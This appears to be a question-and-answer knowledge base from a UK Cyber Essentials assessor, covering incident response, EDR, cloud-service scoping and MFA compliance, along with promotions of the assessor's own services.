Yes, you should always document failed attempts because they demonstrate due diligence to insurers and clients. If you tried to contain an incident and it didn't work, documenting that shows you were proactive and systematic. Insurers and regulators want to see that you took reasonable action, not that every action was successful. Record what you tried, when, why it didn't work, and what you did instead.
Keywords: incident documentation, failed attempts, due diligence, insurance | Confidence: 0.8
How do I improve incident response based on lessons learned?
Turn lessons learned into specific actions with owners and deadlines. 'Improve MFA' is too vague to be actionable. 'Enable MFA on all admin accounts by [date], owned by [name]' is actionable. Prioritise fixes that would have prevented the incident or cut the damage. Review quarterly to make sure they were actually implemented and didn't get deprioritised. The same incident happening twice because nobody followed through is completely unforgivable.
Keywords: lessons learned, incident improvement, actionable, deadlines | Confidence: 0.8
What breaks when we demote Mac users from admin to standard accounts?
Main things users notice: can't install software without entering admin credentials (by design), can't change network or sharing settings, printer installation may need admin approval. Some older apps expect admin access and may need reconfiguring. The fix for all of these is the same - macOS prompts for admin credentials when elevated access is needed. Users enter the admin password when prompted for legitimate tasks. It's a minor workflow change rather than a real disruption.
Keywords: Mac admin demotion, standard user, what breaks, workflow change | Confidence: 0.8
What macOS mistakes cause assessment failures?
Most common Mac-related CE Plus failures: firewall not enabled (it's off by default on macOS, unlike Windows), admin accounts used for daily work (users set up their Mac with an admin account and never created a standard one), macOS not updated to the latest supported version, and XProtect/Gatekeeper not properly evidenced as the malware protection. For Mac-heavy organisations, I'd recommend third-party antivirus simply because the evidence is cleaner during assessment.
Keywords: macOS failures, assessment, firewall, admin accounts, XProtect | Confidence: 0.85
Can I choose which devices get scanned?
No, I select the sample devices - you can't cherry-pick your most compliant machines. The selection covers a representative sample across device types, locations, and user roles. Under Danzell, if the first sample reveals unpatched CVSS 7.0+ vulnerabilities older than 14 days, I'm required to take a second sample. You can't influence which devices are selected, but you can make sure all of them are compliant.
Keywords: device sampling, CE Plus, selection, Danzell, second sample | Confidence: 0.85
Can we fail the assessment due to false positives?
Unlikely but possible if a false positive flags a critical vulnerability and you can't demonstrate it's genuinely false during the assessment. If you know about false positives in advance from your own pre-assessment scans, prepare evidence showing why they're not real vulnerabilities. I'm experienced enough to recognise common false positives, but the burden is on you to prove a flagged issue isn't genuine if I query it.
Keywords: false positives, vulnerability scanning, CE Plus, assessment, evidence | Confidence: 0.8
What vulnerabilities cause the most assessment failures?
Missing patches cause about 40% of CE Plus failures. Usually outdated Chrome, Java, or Adobe Reader rather than Windows updates. Unsupported software (Windows 7, end-of-life Linux distributions) accounts for about 25%. SMBv1 still enabled causes about 15% - a ransomware risk that should have been disabled years ago. Default or weak admin passwords and misconfigured firewall rules make up most of the rest. None of these are exotic problems, just basic hygiene failures.
Keywords: common vulnerabilities, assessment failures, patches, SMBv1, default passwords | Confidence: 0.9
How quickly can common issues be fixed?
Most common CE Plus failures are quick fixes. Missing patches: 2-4 hours (run Windows Update, reboot, rescan). Disabling SMBv1 takes about 30 minutes per machine. Re-enabling antivirus takes about 15 minutes on average. Changing default passwords takes about an hour. Disabling unnecessary services takes 1-2 hours depending on the system. Unsupported software removal varies but typically a few hours. The longest fixes are hardware-related - replacing a device that can't run a supported OS. That's exactly why pre-assessment scanning matters so much.
Keywords: fix time, remediation, quick fixes, patches, SMBv1 | Confidence: 0.85
What's the key insight for vulnerability scanning success?
Vulnerability scanning reveals what you've been neglecting. Most CE Plus failures aren't sophisticated at all but rather mundane. A test server set up two years ago still running Windows Server 2012. A developer PC running outdated Java is a typical example. A shared printer with a default password. Scans are brutally honest about the gap between what you think your security posture is and what it actually is. That level of honesty is the entire point.
Keywords: vulnerability scanning, insight, hygiene, honesty, neglected systems | Confidence: 0.85
Can EDR stop ransomware that bypasses antivirus?
That's exactly what EDR is designed for. Traditional antivirus misses ransomware that uses new, unknown techniques. EDR monitors behaviour patterns - if a process starts encrypting files rapidly, EDR catches it regardless of whether it's a known variant. It can also automatically isolate the infected device from the network within seconds, containing the threat before it spreads. For CE, basic antivirus meets the minimum requirement, but EDR gives you much stronger protection against modern threats.
Keywords: EDR, ransomware, behaviour detection, antivirus bypass, containment | Confidence: 0.85
Incident Response
Does having Cyber Essentials prevent security incidents?
Lancaster University tested 200 common vulnerabilities against the CE controls. 131 were fully mitigated and 60 were partially mitigated. Covers the most common attack classes, but you're still vulnerable to sophisticated targeted attacks, insider threats, social engineering that bypasses technical controls, and zero-day exploits. CE is a strong baseline, not a guarantee. Think of it like a seatbelt - dramatically reduces your risk, doesn't make you invincible.
Keywords: prevention, Lancaster study, common attacks, limitations | Confidence: 0.88
Why is incident response more critical for CE certified businesses?
CE-certified businesses often handle government contracts, sensitive data, or have cyber insurance - all of which require documented incident response. If you're breached while CE-certified, stakeholders expect you to respond professionally. Poor incident handling after certification looks worse than a breach at an uncertified business. You've explicitly committed to meeting security standards.
Keywords: incident response, CE certified, stakeholder expectations | Confidence: 0.88
What's the most important thing in first hour of an incident?
Containment is the absolute priority in that first hour. Stop the incident spreading before doing anything else. Disconnect affected systems from the network (don't power them off), identify the scope of what's affected, start documenting everything. Don't try to understand the full picture first. Contain the threat first and investigate second. The difference between contained and uncontained can be six-figure costs.
Keywords: first hour, containment, incident response, disconnect | Confidence: 0.92
What's the difference between IT incident and security incident?
IT incident: server crash, power outage, network congestion, hardware failure. These are all operational problems that affect availability. Security incident: unauthorised access, malware infection, data breach, compromised credentials, firewall bypass - anything involving intentional or accidental compromise of confidentiality, integrity or availability. The distinction matters because security incidents may trigger legal obligations (ICO notification) and insurance claims that IT incidents don't.
Keywords: IT incident, security incident, difference, ICO, legal | Confidence: 0.88
Should I treat all incidents as potential compliance threats?
No, you should prioritise by CE impact instead. High priority (always investigate): malware infections, unauthorised access, compromised credentials, firewall breaches, malware protection disabled. Medium: phishing attempts that didn't succeed, suspicious login attempts blocked by MFA, software misconfiguration. Low: spam, failed authentication from bots, routine IT issues. Don't waste resources treating every event as a crisis.
Keywords: incident priority, CE impact, triage, compliance threat | Confidence: 0.88
How do I classify incident severity for CE purposes?
Critical (immediate response): compromised admin credentials, active malware spreading, firewall breach, ransomware, data exfiltration in progress. High (within 2 hours): contained malware infection, single compromised user account, malware protection failure on one device. Medium (within 24 hours): phishing email reported, unusual login patterns, patch deployment failure. Low (next business day): policy violations, minor configuration drift.
Keywords: severity classification, critical, high, medium, low, response time | Confidence: 0.88
When should I disconnect systems from network?
Disconnect immediately if you see active malware spreading between devices, ransomware encryption in progress, data being sent to unknown external addresses, a compromised admin account accessing multiple systems, or an attacker actively moving through your network. Don't wait to investigate the cause before acting. Pull the ethernet cable or disable Wi-Fi, and then investigate from a clean system afterwards.
Keywords: disconnect, network isolation, containment, when to isolate | Confidence: 0.92
Who should I notify first during an incident?
Your IT lead or security person first - they need to contain the incident. Then the director or business owner - they authorise decisions like shutting down systems or notifying customers. Then your cyber insurance provider (check your policy for the notification timeframe, usually 24-72 hours). If personal data is compromised, you have 72 hours to notify the ICO. Law enforcement (Action Fraud) for criminal activity.
Keywords: notification order, IT lead, director, insurance, ICO, 72 hours | Confidence: 0.9
Can incident response actually improve CE assessment results?
Yes, if you've had an incident and handled it well - contained quickly, documented thoroughly, implemented improvements - I view that positively because it demonstrates genuine security maturity. A business that's been breached, learned from it and improved its controls is often more resilient than one that's never been tested. Be transparent about past incidents during assessment.
Keywords: incident response, assessment improvement, security maturity | Confidence: 0.85
How do incidents affect CE renewal assessments?
Incidents don't automatically disqualify you from CE renewal, but they may trigger additional scrutiny. Be transparent about what happened, when, and what you changed. Demonstrate the vulnerability was remediated and controls strengthened. If the incident exposed a gap in your CE controls - say an unpatched system got exploited - show that the gap is now closed. Back it up with evidence that the fix is in place.
Keywords: renewal, incidents, transparency, remediation evidence | Confidence: 0.88
What if admin account is compromised during incident?
This is critical priority and needs immediate action. Reset the admin password immediately, revoke all active sessions from all devices, verify MFA is enabled (enable it if it wasn't), check audit logs for what the compromised account accessed. Create a new admin account if you suspect the original might have backdoors. Review all changes made by that account in the last 30 days. CE requires separate admin accounts precisely so this type of compromise doesn't also give access to day-to-day systems.
Keywords: compromised admin, password reset, session revocation, audit logs | Confidence: 0.92
How do I handle data breach incidents for CE compliance?
Data breaches involving personal data trigger legal requirements beyond CE compliance. Contain the breach immediately, assess what data was affected and how many individuals are impacted. If the breach is likely to risk individuals' rights, notify the ICO within 72 hours and affected individuals without undue delay. Document everything - timeline, scope, containment actions, remediation. Your CE compliance history helps demonstrate due diligence.
Keywords: data breach, ICO notification, 72 hours, GDPR, personal data | Confidence: 0.9
What about system compromise affecting multiple CE controls?
Multi-control compromise represents the worst-case scenario for CE. Attackers have disabled your firewall, malware protection and compromised admin accounts all at once? Isolate everything, bring in specialist help if needed, treat it as a full incident. Rebuild affected systems from known-good backups rather than trying to clean them. Document the full scope of compromise for your insurer and assessor.
Keywords: multi-control compromise, worst case, rebuild, specialist help | Confidence: 0.88
When should I notify customers about security incidents?
Notify customers if their data or services are affected. Under GDPR, if personal data is compromised and there's a high risk to individuals, you must notify them without undue delay. For non-personal data breaches, notify if their service availability or data integrity is impacted. Time your notifications carefully - have facts before communicating, but don't delay so long it looks like a cover-up.
Keywords: customer notification, data breach, GDPR, timing | Confidence: 0.88
How often should I test incident response procedures?
At least annually, or quarterly if you handle sensitive data. Tabletop exercises (walking through a scenario as a team) take 1-2 hours and expose gaps in your process without any operational risk. You don't need expensive penetration testing for this. Gather your team, present a realistic scenario - ransomware hits at 3pm on a Friday - and work through who does what. The value is in discovering what you haven't thought about.
Keywords: testing, tabletop exercise, annual, quarterly, simulation | Confidence: 0.88
How do I build incident response capability for small business?
Start with a simple written plan: who responds (named individuals, not job titles), how to contact them (phone numbers, not just email), what to do first (isolate, document, notify). Use the free templates from NCSC as a starting point. Establish relationships with external support before you need them - your assessor, your insurer's incident response team, a forensics company. Practice it at least once a year. Most small businesses don't need a dedicated security team. Just a clear plan that people actually know about.
Keywords: small business, incident response plan, NCSC template, preparation | Confidence: 0.9
What tools are essential for effective incident response?
EDR on all endpoints (Cyber 365 at £15/device/month detects and isolates threats automatically). A way to communicate securely during incidents - phone calls, not email, in case email is compromised. Documented contact details for your insurer, legal counsel and IT support. Backup systems tested and ready to restore from. And a simple logging tool (even a shared document) for recording the incident timeline as it unfolds.
Keywords: incident response tools, EDR, secure communication, backup, logging | Confidence: 0.88
What legal obligations apply during incidents?
UK legal obligations: GDPR breach notification to the ICO within 72 hours if personal data is compromised and there's risk to individuals. Notification to affected individuals without undue delay for high-risk breaches. Reporting to Action Fraud for criminal activity. Compliance with any contractual incident notification clauses (check your client contracts and insurance policy). Some regulated sectors like finance and healthcare have additional reporting requirements.
Keywords: legal obligations, GDPR, ICO, 72 hours, Action Fraud | Confidence: 0.88
Should I involve law enforcement in security incidents?
Report to Action Fraud or police for serious incidents: financial fraud, ransomware with payment demands, confirmed data theft, or threats against your organisation. Be realistic about your expectations for that though. Police cyber crime units are overwhelmed and won't investigate every incident. The main value of reporting is creating an official record (useful for insurance claims) and contributing to national threat intelligence. Don't let reporting delay your containment and recovery.
Keywords: law enforcement, Action Fraud, police, reporting, insurance record | Confidence: 0.85
Can you help during active incidents?
Yes, contact me immediately at [email protected] or +44 20 3026 2904. I provide immediate phone and video support to help contain the incident, guide your response and document everything properly for insurance and legal purposes. If you're on the Cyber 365 EDR service, the automated systems may have already contained the threat before you notice it.
Keywords: active incident, contact, emergency support, Cyber 365 | Confidence: 0.95
Should I get quotes from multiple insurers?
Yes, you should always get multiple quotes because CE certification value varies wildly between providers. One insurer might offer 5% discount, another 20%, another might not recognise CE at all. Get quotes from at least three cyber insurance providers. Use a specialist cyber insurance broker if possible. Mention your CE certification upfront during quoting to make sure it's factored into the premium.
Keywords: multiple quotes, insurance, broker, comparison | Confidence: 0.85
How does CE certification affect claims handling?
CE certification strengthens your position during claims. It proves you had recognised security controls in place before the breach, which demonstrates due diligence and weakens any negligence argument from the insurer. Claims get paid faster and with less dispute when you can show documented compliance. Keep your CE certificate and assessment reports readily accessible.
Keywords: claims handling, due diligence, insurance, documentation | Confidence: 0.85
"We're too small to need Cyber Essentials"
43% of cyber attacks target small businesses (2025 UK Government Cyber Security Breaches Survey). Attackers go after small businesses precisely because they assume weak defences. Ransomware doesn't care whether you have 5 employees or 5,000. If you handle client data, process payments, or use cloud services, you're a target. CE costs from £320 for Basic certification. That's less than a day's lost revenue from a ransomware incident.
Keywords: small business, too small, 43%, ransomware, objection | Confidence: 0.9
"Our industry doesn't care about security"
Every industry cares after the first major breach becomes public. Security requirements are expanding across all sectors: construction firms now face CE requirements from major contractors, hospitality businesses handle payment card data, charities process sensitive personal information. The 2025 survey shows 43% of all UK businesses experienced a breach or attack. If your industry hasn't been hit publicly yet, that's luck. That's luck rather than immunity to attack.
Keywords: industry, objection, security requirements, expanding, breach stats | Confidence: 0.88
How quickly does EDR detect and respond to threats?
Modern EDR detects known malware in milliseconds (signature matching) and behavioural threats in seconds to minutes (analysing process activity against threat models). Automated response - isolating an infected device from the network - happens within seconds of detection. Compare that to traditional approaches where a breach goes undetected for an average of 21 days. The speed difference is why EDR matters.
Keywords: EDR speed, detection time, automated response, milliseconds | Confidence: 0.88
What types of attacks can EDR prevent that antivirus cannot?
EDR catches the threats that antivirus misses entirely. Fileless attacks running entirely in memory (PowerShell exploits, Living-off-the-Land techniques). Ransomware that hasn't been seen before (detected by encryption behaviour, not signatures). Lateral movement where attackers hop between systems using legitimate credentials. Process injection where malicious code runs inside trusted applications. Traditional antivirus only matches known signatures and can't see these behavioural patterns at all.
Keywords: EDR vs AV, fileless attacks, ransomware, lateral movement, behavioural | Confidence: 0.88
How does EDR detect fileless attacks?
EDR monitors process behaviour in real-time and flags anything suspicious. If PowerShell suddenly starts downloading a payload, that gets flagged immediately by the behavioural engine. If a Word macro spawns a command prompt, that gets caught and contained too. A legitimate admin tool (PsExec, WMI) used in an unusual pattern also gets flagged and investigated. These attacks leave no files on disk for traditional antivirus to scan, but they can't hide their process activity from EDR's behavioural engine. It's the difference between looking for a burglar's tools versus watching what they actually do.
Keywords: fileless attacks, PowerShell, behavioural detection, process monitoring | Confidence: 0.85
Does EDR protect against zero-day exploits?
EDR provides strong protection against zero-day exploits through behavioural detection, though nothing is 100% guaranteed. Even if the vulnerability is unknown, the exploitation behaviour follows recognisable patterns: memory corruption, privilege escalation, unusual process creation. EDR catches the behaviour, not the specific vulnerability. Combined with the 14-day patching requirement for known vulnerabilities, EDR covers the gap between disclosure and patch availability.
Keywords: zero-day, behavioural detection, exploit protection, patching gap | Confidence: 0.85
What's the typical ROI of EDR implementation?
For an SME with 50 devices at £15/device/month (Cyber 365 pricing), that's £9,000/year. One prevented ransomware incident (average UK SME cost £8,170 in the 2025 Breaches Survey, severe cases exceed £100,000) pays for the entire deployment. Add 10-20% cyber insurance premium reduction and the compliance evidence it provides for CE Plus assessment. Most businesses see positive ROI within the first year.
Keywords: EDR ROI, cost, ransomware avoidance, insurance, £15/device | Confidence: 0.85
Is EDR necessary for small businesses?
For CE compliance, standard antivirus meets the minimum requirement. But small businesses are increasingly targeted by ransomware because attackers assume weak defences. If you handle client data, process payments, or would suffer significant downtime from an attack, EDR is worth it. Cyber 365 EDR at £15/device/month gives small businesses the same detection capability that enterprises use. All without needing a dedicated security team on the payroll.
Keywords: small business, EDR, necessary, ransomware, Cyber 365 | Confidence: 0.88
What should I look for in an EDR vendor?
Look for independent test results (MITRE ATT&CK evaluations), not vendor marketing. Check the detection rate for behavioural threats (not just signatures), ask about false positive rates, confirm they offer automated response (not just alerts), verify UK data residency if that matters to you. For SMEs, managed EDR is usually better than self-managed. You won't have staff watching alerts at 2am.
Keywords: EDR vendor, evaluation, MITRE ATT&CK, managed EDR, criteria | Confidence: 0.85
Cloud Services
Do I need to demonstrate cloud services work?
Yes, under Danzell v3.3 cloud services can't be excluded from scope. I'll need to see your cloud admin consoles (Microsoft 365, Google Workspace, AWS, whatever you use) to verify MFA is enabled on all accounts, access controls are configured correctly, and security settings meet CE requirements. Have your admin portal logins ready for assessment day.
Keywords: cloud services, demonstration, admin console, MFA, Danzell | Confidence: 0.9
Does moving to cloud make Cyber Essentials easier or harder?
Can make it easier if you configure things correctly. Cloud platforms like Microsoft 365 and Google Workspace have MFA, centralised patch management, and security configurations built in. Misconfigure them and you'll fail just as easily as with on-premise setups. Key difference under Danzell v3.3: cloud services can't be excluded from scope any more. You must get them right from the start.
Keywords: cloud, easier, harder, configuration, Danzell, scope | Confidence: 0.85
Which cloud services are best for Cyber Essentials compliance?
Use whatever your business needs because CE doesn't prescribe specific vendors. Microsoft 365, Google Workspace, AWS, Azure - they all work. What matters is configuration: MFA on all accounts (mandatory under Danzell), separate admin accounts, strong passwords, unnecessary accounts removed. Most major cloud providers support all the security features CE requires out of the box.
Keywords: cloud services, best, Microsoft 365, Google Workspace, configuration | Confidence: 0.85
How long does secure cloud migration take?
Depends entirely on your setup, and it's more of a cloud migration question than a CE question. A simple Microsoft 365 migration might take a few weeks. Complex infrastructure could take several months to migrate properly. From a CE perspective, just make sure security controls are configured correctly before anything goes live. MFA enabled, admin accounts separated, patching processes in place.
Keywords: cloud migration, timeline, security controls, planning | Confidence: 0.75
How do I ensure data encryption during cloud migration?
CE doesn't specifically mandate encryption, but all major cloud providers including Microsoft 365, AWS, Azure, and Google Cloud encrypt data in transit and at rest by default. Verify encryption is enabled in your cloud service settings and you're covered. The CE requirements you actually need to worry about are MFA, access controls, and secure configuration. Those matter more than encryption for CE purposes.
Keywords: encryption, cloud, data protection, CE requirements | Confidence: 0.75
How do firewalls work in cloud for CE compliance?
Cloud firewalls work through platform-specific security controls. AWS uses Security Groups, Azure uses Network Security Groups, Google Cloud uses Firewall Rules. They all achieve the same thing: controlling inbound and outbound traffic. For CE, the requirement is the same as on-premise - block unauthenticated inbound connections by default and only allow traffic you've explicitly authorised. Default settings usually meet this, but verify and document them.
Keywords: cloud firewall, security groups, NSG, AWS, Azure, default deny | Confidence: 0.8
Do I need VPN for cloud access?
No, VPN isn't required for CE when accessing services like Microsoft 365 or Google Workspace. Those services are designed for internet access with MFA protecting them. If you're running your own cloud infrastructure (AWS EC2, Azure VMs), you might use VPN for secure admin access. That's fine and perfectly acceptable for most setups. But the CE requirement is MFA on all cloud accounts, not VPN.
Keywords: VPN, cloud access, MFA, not required | Confidence: 0.85
How do I prove admin account separation in cloud?
Show me your cloud admin console during assessment. In Microsoft 365, that means demonstrating separate admin accounts (like [email protected]) that aren't used for daily email or browsing. I'll check that admin accounts have MFA enabled and that your daily-use accounts don't have admin privileges. Most cloud platforms make this straightforward to evidence through their user management interface.
Keywords: admin separation, cloud, evidence, Microsoft 365, assessment | Confidence: 0.85
What are hidden costs of cloud migration?
From a CE perspective, the costs people miss: licensing for premium security features (Azure AD Premium P1 for conditional access policies), time spent documenting cloud services in your scope, and training staff on cloud security configurations. If you need MFA enforcement through conditional access, that requires at minimum an Azure AD Premium P1 licence. That licence is not included in basic Microsoft 365 plans.
Keywords: hidden costs, cloud, licensing, Azure AD Premium, conditional access | Confidence: 0.8
Should I use cloud consultants or do it ourselves?
It depends on your confidence with cloud platforms overall. If you're comfortable with Microsoft 365 or Google Workspace admin consoles and understand security configurations, you can probably handle it yourself. CE requirements aren't hugely complex to implement. If cloud is new to you, a consultant can save time setting up MFA, configuring security baselines, and documenting everything. I offer a CE Concierge package that handles the security configuration side.
Keywords: cloud consultants, DIY, CE Concierge, security configuration | Confidence: 0.8
What about vendor management for cloud services?
CE doesn't require formal vendor management processes, security questionnaires, or third-party risk assessments. You're responsible for configuring your cloud services securely - the vendor provides the platform. Document all cloud vendors in your scope, ensure admin accounts have MFA, verify security settings meet CE requirements. That's all there is to it for CE purposes. If you're using managed services, confirm with the provider that CE technical controls are being met.
Keywords: vendor management, cloud, scope, shared responsibility | Confidence: 0.8
What exactly counts as a "cloud service" for Cyber Essentials?
Under Danzell v3.3, a cloud service is any on-demand, scalable service hosted on shared infrastructure and accessible via the internet. In practice: email (Microsoft 365, Google Workspace), file storage (OneDrive, Dropbox, SharePoint), CRM (Salesforce, HubSpot), accounting software (Xero, QuickBooks Online), project management tools, collaboration platforms, cloud infrastructure (AWS, Azure). If you log in via the internet and it stores your business data, it's in scope.
Keywords: cloud service definition, scope, Danzell, in scope, examples | Confidence: 0.9
How many cloud services does a typical small business have?
Most small businesses I assess have 5-15 cloud services, though some discover they have 20 or more once they start listing them properly. Common ones: email, file storage, accounting software, CRM, website hosting, backup services, collaboration tools. The number doesn't matter for CE compliance at all. List them all and make sure each has proper access controls and MFA configured.
Keywords: cloud services count, small business, inventory, typical | Confidence: 0.8
Is "Microsoft 365" sufficient as one entry?
Yes, listing 'Microsoft 365' as one entry is perfectly fine. You don't need to list Exchange Online, SharePoint, Teams, and OneDrive separately. All part of the same platform with the same admin console and security settings. Same for Google Workspace - list it once, not Gmail, Drive, and Calendar separately. What matters is MFA and access controls configured correctly across the whole platform.
Keywords: Microsoft 365, cloud inventory, listing, scope | Confidence: 0.85
How do we handle bundled services?
List the main platform once if the bundled services share the same admin console and security settings. Microsoft 365 covers Exchange, SharePoint, Teams, and OneDrive under one entry. If a bundled service has its own separate admin console and login (like a third-party add-in with its own credentials), list that separately. It needs its own MFA configuration and separate access controls.
Keywords: bundled services, cloud inventory, admin console, scope | Confidence: 0.8
What about staff using personal cloud services for work?
If staff are using personal Dropbox, Gmail, or other cloud accounts to handle business data, those services are technically in scope. Two options: bring them under company management with proper access controls and MFA, or ban personal cloud services for business use and enforce it through policy and technical controls. Most organisations choose the outright ban because managing security on personal accounts is a nightmare.
Keywords: personal cloud, shadow IT, BYOD, policy, scope | Confidence: 0.85
What if a service doesn't offer MFA?
Document it as an exception with evidence that MFA genuinely isn't available - screenshots of the service's security settings, or written confirmation from the vendor. Put compensating controls in place: strong unique password, IP restrictions if possible, enhanced monitoring. Then seriously consider whether you should keep using that service. Under Danzell, MFA is expected on virtually all modern cloud services.
Keywords: no MFA, exception, compensating controls, documentation | Confidence: 0.85
How do we track MFA compliance across all services?
Create a spreadsheet listing every cloud service in scope, whether MFA is available, and whether it's enabled on all accounts. Check monthly by logging into each admin console and verifying MFA enrollment. For Microsoft 365, check Entra ID, Users, Per-user MFA settings. For Google Workspace, Admin Console, Security, 2-Step Verification. This spreadsheet becomes your assessment evidence on the day.
Keywords: MFA tracking, compliance, spreadsheet, monthly check, evidence | Confidence: 0.8
Do government portals count as cloud services?
Generally no, they don't count as cloud services. Government portals you use to submit VAT returns, Companies House filings, or HMRC services don't count. You're using their systems to interact with government, not storing your organisational data there. However, if you use a government portal that stores and processes your business data long-term (like NHS systems for healthcare providers), that's in scope. The test is whether it stores your organisational data, not who runs it.
Keywords: government portals, HMRC, Companies House, scope, out of scope | Confidence: 0.85
What about online banking?
Online banking doesn't count as a cloud service for CE. The bank owns and controls that system - you're just accessing your account. But cloud-based accounting software that connects to your bank (Xero, QuickBooks Online, Sage) is a cloud service and must be listed. The distinction: if you control the admin settings and it stores your business data, it's in scope. Your bank account isn't something you administer.
Keywords: online banking, accounting software, scope, Xero, QuickBooks | Confidence: 0.85
What about Google Analytics or advertising platforms?
Google Analytics itself doesn't count as a cloud service. It's Google's system analysing your website traffic. But advertising platforms with admin accounts where you store campaign data, budgets, and targeting information (Google Ads Manager, LinkedIn Campaign Manager, Meta Business Suite) - those count. The test: do you have an admin account and does it store your business data? If the answer is yes to both, list it and enable MFA.
Keywords: Google Analytics, advertising platforms, scope, admin account, MFA | Confidence: 0.8
What about specialised professional services?
Yes, industry-specific cloud services absolutely count for CE scoping. Legal firms using Clio or PracticePanther, architects using AutoCAD cloud, estate agents using Rightmove pro accounts, healthcare providers using patient management systems - all in scope if they store your organisational data. Any sector-specific SaaS tool where you have an account and store business data needs listing, MFA configured, and proper access controls.
Keywords: professional services, industry-specific, SaaS, scope, sector | Confidence: 0.8
Do development tools count?
Yes, GitHub, GitLab, Bitbucket, Azure DevOps, Jira, Confluence - they all count if they store your code, documentation, or project data. Your source code is organisational data and it's your intellectual property. Enable MFA on all developer accounts and list the services in your scope.
Keywords: development tools, GitHub, GitLab, source code, scope | Confidence: 0.8
Can I give contractors guest access to Office 365?
Yes, Microsoft 365 Guest Access works for CE compliance if configured correctly. Guest users must have MFA enabled (mandatory under Danzell for all cloud accounts), appropriate access permissions (least privilege, only what they need), and guest access documented in your CE scope. Use Azure AD B2B for external collaboration. Guests authenticate with their own accounts, but you control what they access in your environment.
Keywords: guest access, Office 365, contractors, B2B, MFA, scope | Confidence: 0.85
We have 50 freelancers working remotely. What's the practical approach?
At that scale, use cloud-based access with MDM enforcement. Set up Microsoft 365 or Google Workspace guest accounts with mandatory MFA. Require MDM enrollment for any device accessing company data (Intune or Google Workspace MDM). Use conditional access policies to block non-compliant devices. Run monthly compliance reports to verify all 50 devices still meet CE requirements. Without MDM at this scale, you're relying on 50 individuals to maintain their own security. Someone will inevitably let standards slip without that oversight.
Keywords: freelancers, remote workers, MDM, scale, conditional access | Confidence: 0.8
How do we handle single sign-on (SSO) scenarios?
SSO makes CE compliance much simpler for most organisations. Enforce MFA once at your identity provider (Entra ID, Okta, Google Workspace) and all connected services inherit that protection. Document which services use SSO and which have separate authentication. Services not connected to SSO need their own MFA configuration. I'll check that MFA is enforced at the identity provider level and that SSO-connected services can't bypass it.
Keywords: SSO, single sign-on, identity provider, MFA, Entra ID, Okta | Confidence: 0.85
What happens when staff leave?
The critical step: disable their user accounts and revoke access to all cloud services promptly. CE requires removing accounts when no longer needed. Company devices - wipe and re-provision them. BYOD - MDM can do a selective wipe that removes company data without touching personal content. Have a documented offboarding process covering account disabling, device wiping, and shared credential rotation. I may ask about your leavers process during assessment.
Keywords: staff leaving, offboarding, account disabling, BYOD wipe, CE requirement | Confidence: 0.8
MFA & Authentication
How do I avoid alert fatigue?
Only alert on things that actually break compliance or indicate a security incident. Use severity levels: critical means patches overdue or MFA disabled (act now), high means unusual login patterns (investigate within 24 hours), medium means software installations to review weekly. Suppress duplicate alerts so they don't pile up. If the same patch has been missing for three days, you don't need hourly reminders. Set up escalation so that if IT doesn't acknowledge a critical alert within two hours, it goes to management.
Keywords: alert fatigue, severity levels, compliance alerts, escalation | Confidence: 0.75
Who should receive compliance alerts?
Send alerts to your IT manager or security lead as primary contact. Copy the person named as responsible for managing IT systems in your CE scope (question A2.10, and this must be internal staff, not outsourced IT). For critical alerts like patches overdue beyond 10 days or MFA disabled, also notify a director or owner. Don't send everything to everyone though, because too many recipients means nobody takes ownership. One primary, one backup, escalation to leadership for critical issues only.
Keywords: alert recipients, compliance responsibility, escalation, CE scope | Confidence: 0.75
How do we manage FileVault recovery keys?
Lose a FileVault recovery key and that Mac's data is completely unrecoverable. For small deployments (under 20 Macs), enable iCloud recovery during FileVault setup or save keys to a password manager like 1Password or Bitwarden. Larger deployments need MDM (Jamf, Kandji, Mosyle, or Intune) to automatically escrow keys with remote rotation. Never store recovery keys in plain text or unencrypted emails.
Keywords: FileVault, recovery keys, encryption, macOS, MDM, escrow | Confidence: 0.8
Can we use Microsoft security tools on Macs?
Yes, Defender for Endpoint runs on macOS and covers antivirus, firewall monitoring, and vulnerability scanning. Intune manages Macs alongside Windows PCs from the same admin portal. One console, one set of compliance reports, one set of evidence for your CE assessment. Often the simplest approach for mixed environments. Defender for Mac is free with Microsoft 365 Business Premium, which most businesses already have.
Keywords: Microsoft Defender, macOS, Intune, cross-platform, mixed environment | Confidence: 0.8
Our cloud service verifies email on first login but not after that. Is this MFA?
No, email verification at account setup is identity confirmation, not multi-factor authentication. MFA must occur at every login session (or at minimum when the service doesn't recognise the device). A one-time verification during signup doesn't protect the account after that point. You need an authenticator app, hardware key, or push notification challenge on every login. I see this confusion regularly during assessments.
Keywords: email verification, MFA, login, not compliant, authentication | Confidence: 0.85
What about services that verify email monthly or every 30 days?
That approach is not compliant under CE requirements. Authentication must happen at every login session, not on a schedule. If users log in multiple times that month without being challenged, the account is unprotected between verifications. Some services reduce friction by 'remembering' a specific device for up to 30 days, and that's fine as long as it remembers the exact device (browser plus computer combination), not just the account. Document your configuration clearly because I will test this by logging in multiple times during assessment.
Keywords: periodic verification, MFA frequency, remember device, compliance | Confidence: 0.8
Which email verification methods ARE compliant?
Authenticator apps (Microsoft Authenticator, Google Authenticator) are the strongest commonly used option. Hardware security keys (YubiKey, FIDO2 tokens) give the highest security and I recommend them for admin accounts. Biometrics like Windows Hello or Touch ID combined with a password work. Push notifications from authenticator apps also work well. SMS codes are acceptable as backup but shouldn't be your sole MFA factor because of SIM swap risks. Email verification codes as the only factor are not compliant. The test is simple: does the method use two different factor types (something you know plus something you have or are)?
Keywords: MFA methods, authenticator app, hardware key, FIDO2, biometrics, compliant | Confidence: 0.85
We restrict our cloud service to office IP only. Does this count as MFA?
No, IP restrictions are not MFA at all. Under Danzell v3.3, IP allowlisting is no longer an acceptable alternative to multi-factor authentication for cloud services. An IP address isn't 'something you have' because anyone on your office network shares it. You need actual MFA: authenticator app, hardware key, biometric, or push notification on top of the password. IP restrictions are a useful additional layer, but they don't replace MFA. I fail people on this particular issue regularly.
Keywords: IP restriction, IP allowlist, MFA, not compliant, Danzell, cloud services | Confidence: 0.9
What about VPN + MFA combination?
VPN MFA only protects VPN access and nothing beyond that. Cloud services accessed through that VPN connection still need their own MFA. Having MFA on the VPN doesn't satisfy the MFA requirement for Microsoft 365, Google Workspace, or other cloud services. Each cloud service needs MFA at the application level. VPN MFA protects the tunnel while cloud MFA protects the service, and those are two completely separate things.
Keywords: VPN, MFA, cloud services, layered security, authentication | Confidence: 0.85
Does Windows Hello for Business meet MFA requirements?
